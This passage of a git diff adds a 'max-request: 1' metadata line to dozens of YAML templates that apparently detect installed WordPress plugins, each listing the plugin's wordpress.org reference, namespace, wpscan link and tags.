tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 3920c5cf56..f210a2a2f9 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: + max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f556786f5a..f1dd1bf150 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: + max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 844e3d19a0..a9ec913599 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: + max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index eb0f02f602..d38aeb0279 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: + max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 755efd53fa..07c43b9d80 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: + max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 0403bb4e72..83a849e11e 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: + max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index cd2632ea05..c6100637d9 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: + max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index b5f8b822c7..1f188b66c6 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: + max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 85aaf7ff16..2c7b16cb44 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: + max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 0af322b728..9d6afa8d3f 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: + max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index d4ac0d179e..87721a245a 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: + max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index dbbadf3cfc..45e0dead0e 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: + max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index 401b0e479f..abec174ec3 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: + max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 6f95506748..e088ac07a6 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: + max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 4404f87aab..8b163200bf 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: + max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8995434fce..2366a7dad7 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: + max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 8175806cb8..71448e61e8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: + max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index db82bc7f43..717554b89f 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: + max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 03ddae57bc..fba5c8b09c 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: + max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d6449bb5bf..631202198e 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: + max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 2d5fdf1779..cc953078eb 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: + max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 6b5705e20d..97ce674116 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: + max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index dbcdb64bad..6d05a6f058 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index fb9ea502ce..baf5af3bb5 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 48ffb25245..aa1898c4ba 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 4fa6fc3ffe..5fae796fdd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 1c1c690fcd..22f812e2b8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: + max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 4d6702d81a..c637006d26 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: + max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 42cb8bc409..e020507ccb 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: + max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 55d6effbf5..c92903fd79 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: + max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 6786cab703..c25b2c1c48 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: + max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 784ba22c8a..4d6dd14d25 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: + max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 72ff55e58a..7ca0870ed6 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: + max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 8cfaa0f5a9..4f0d9be568 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: + max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 85900a01a7..f3c481b824 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: + max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index a7ccde0b49..ba214fd7ea 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: + max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 422664a98c..8f5fe8d9a5 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: + max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index f0af3a748a..0458b13354 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: + max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index f89f1a20b3..d570be07bf 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: + max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 01fb12d0ad..ee05e3add8 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: + max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 1773857e15..df2487955f 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: + max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index bcd1509c68..79ff01211c 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: + max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index c6aca20a60..23414b3d1d 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: + max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 56dfdf4a59..fba45020e4 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reviews-plugin-for-google/ metadata: + max-request: 1 plugin_namespace: wp-reviews-plugin-for-google wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 810fc82cde..0178c8e9fb 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: + max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 783d381ed8..a04ddc6003 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: + max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 8bdc600063..2ead906817 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: + max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index ab61cc0338..dedd2e23b6 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: + max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 5f6fbc1f75..03cd7137a8 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: + max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index d67150d038..a68d4b7d78 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: + max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index beeba7ca69..bf9dfc3ad8 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: + max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index c225df7bfd..47911a86a5 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: + max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaad04cb76..1c25b6f488 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: + max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index ff750a7d2a..b36317acd8 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: + max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index f1e7595ccd..5eb35dd17e 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: + max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml 